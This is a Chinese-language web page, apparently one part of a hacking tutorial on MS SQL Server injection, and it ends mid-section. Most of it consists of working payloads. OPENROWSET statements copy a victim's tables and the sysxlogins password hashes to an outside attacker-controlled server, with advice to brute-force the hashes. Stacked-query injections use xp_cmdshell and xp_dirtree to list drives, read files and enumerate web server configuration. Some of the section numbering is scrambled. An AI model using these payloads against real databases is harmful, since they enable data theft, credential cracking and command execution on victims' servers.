非常经典的Ms Sql注射资料

核心提示： 之后，便可以从本地数据库中看到目标主机的库结构，非常经典的Ms Sql注射资料(10)，这已经易如反掌，不多讲，方法如下：insertintoOPENROWSET('SQLOLEDB','uid=sa;pwd=apachy_123;Network=DBMSSOCN;

之后，便可以从本地数据库中看到目标主机的库结构，这已经易如反掌，不多讲，复制数据库：

insertintoOPENROWSET('SQLOLEDB','uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;','select*fromtable1')select*fromdatabase..table1
insertintoOPENROWSET('SQLOLEDB','uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;','select*fromtable2')select*fromdatabase..table2
......


3、复4、制哈西表（HASH）

这实际上是上述复5、制数据库的一个扩展应用。登录密码的hash存储于sysxlogins中。方法如下：

insertintoOPENROWSET('SQLOLEDB','uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;','select*from_sysxlogins')select*fromdatabase.dbo.sysxlogins

得到hash之后，6、就可以进行暴力破解。这需要一点运气和大量时间。

遍历目录的方法：

先创建一个临时表：temp

'5;createtabletemp(idnvarchar(255),num1nvarchar(255),num2nvarchar(255),num3nvarchar(255));--
5';inserttempexecmaster.dbo.xp_availablemedia;--获得当前所有驱动器
5';insertintotemp(id)execmaster.dbo.xp_subdirs'c:';--获得子目录列表
5';insertintotemp(id,num1)execmaster.dbo.xp_dirtree'c:';--获得所有子目录的目录树结构,并寸入temp表中
5';insertintotemp(id)execmaster.dbo.xp_cmdshell'typec:webindex.asp';--查看某个文件的内容
5';insertintotemp(id)execmaster.dbo.xp_cmdshell'dirc:';--
5';insertintotemp(id)execmaster.dbo.xp_cmdshell'dirc:*.asp/s/a';--
5';insertintotemp(id)execmaster.dbo.xp_cmdshell'cscriptC:InetpubAdminScriptsadsutil.vbsenumw3svc'
5';insertintotemp(id,num1)execmaster.dbo.xp_dirtree'c:';--（xp_dirtree适用权限PUBLIC）
写入表：